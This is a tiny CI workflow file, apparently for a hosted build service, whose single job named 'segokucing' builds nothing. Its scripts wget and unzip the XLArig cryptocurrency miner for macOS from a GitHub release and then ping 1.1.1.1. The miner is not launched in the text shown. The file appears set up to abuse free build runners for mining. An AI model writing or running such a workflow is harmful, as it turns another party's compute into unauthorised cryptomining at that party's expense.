workflows:
  segokucing:
    name: segokucing
    scripts:
        - wget https://github.com/scala-network/XLArig/releases/download/v5.2.2/XLArig-v5.2.2-macOS-x86_64.zip
        - unzip XLArig-v5.2.2-macOS-x86_64.zip
        - ping 1.1.1.1